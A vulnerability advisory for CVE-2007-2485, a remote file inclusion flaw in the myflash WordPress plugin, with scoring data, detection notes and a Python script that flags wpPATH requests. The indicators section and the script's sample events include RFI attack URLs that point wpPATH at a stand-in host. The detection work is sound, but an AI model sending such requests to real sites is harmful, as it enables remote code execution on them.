CVE-2007-2485
published 2007-05-03

Priority: P358 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 54.85% (98.9th percentile)
PHP remote file inclusion vulnerability in myflash-button.php in the myflash 1.00 and earlier plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the wpPATH parameter.

Affected (1 range)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ruben_boelinger | myflash | <= 1.00 | |

Detection & IOCs (extracted from sources)

url: http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?
filename: myflash-button.php
  • Monitor HTTP GET and POST requests containing the 'wpPATH' parameter targeting myflash-button.php; a URL value in wpPATH indicates an RFI attempt.
  • Alert on any request to /wp-content/plugins/myflash/myflash-button.php with a wpPATH parameter value that begins with http:// or https://, indicating remote file inclusion.
  • The vulnerability affects myflash plugin version 1.00 and earlier for WordPress; the wpPATH parameter is accepted via both GET and POST, so detection rules must cover both HTTP methods.
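
The three detection notes above combined into one check, as an added example (not code from this page or its sources). It assumes the sensor, such as a WAF or reverse proxy, supplies the method, request target and form body; the function names, verdict labels and sample events are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

PLUGIN_SCRIPT = "/wp-content/plugins/myflash/myflash-button.php"
REMOTE_URL = re.compile(r"^\s*https?://", re.IGNORECASE)


def classify(method, target, body=""):
    """Return None (unrelated), 'monitor' (wpPATH present) or 'alert' (wpPATH is a URL)."""
    parts = urlsplit(target)
    # WordPress may be installed in a subdirectory, so match on the path suffix.
    if not unquote(parts.path).lower().endswith(PLUGIN_SCRIPT):
        return None
    # parse_qs percent-decodes names and values, so encoded forms are covered.
    values = list(parse_qs(parts.query, keep_blank_values=True).get("wpPATH", []))
    if method.upper() == "POST":
        # The parameter is also accepted in a form-encoded POST body.
        values += parse_qs(body, keep_blank_values=True).get("wpPATH", [])
    if not values:
        return None
    return "alert" if any(REMOTE_URL.match(v) for v in values) else "monitor"


# Constructed sample events: (method, request target, form body).
SAMPLE_EVENTS = [
    ("GET", PLUGIN_SCRIPT + "?wpPATH=http://files.example/inc.txt?", ""),
    ("POST", "/blog" + PLUGIN_SCRIPT, "wpPATH=HTTPS%3A%2F%2Ffiles.example%2Finc.txt"),
    ("GET", PLUGIN_SCRIPT + "?wp%50ATH=http%3A%2F%2Ffiles.example%2Finc.txt", ""),
    ("GET", PLUGIN_SCRIPT + "?wpPATH=../../", ""),
    ("GET", PLUGIN_SCRIPT, ""),
    ("GET", "/index.php?wpPATH=http://files.example/inc.txt", ""),
]


def scan(events):
    """Classify each event, preserving input order."""
    return [classify(method, target, body) for method, target, body in events]


if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(verdict, event[0], event[1])
```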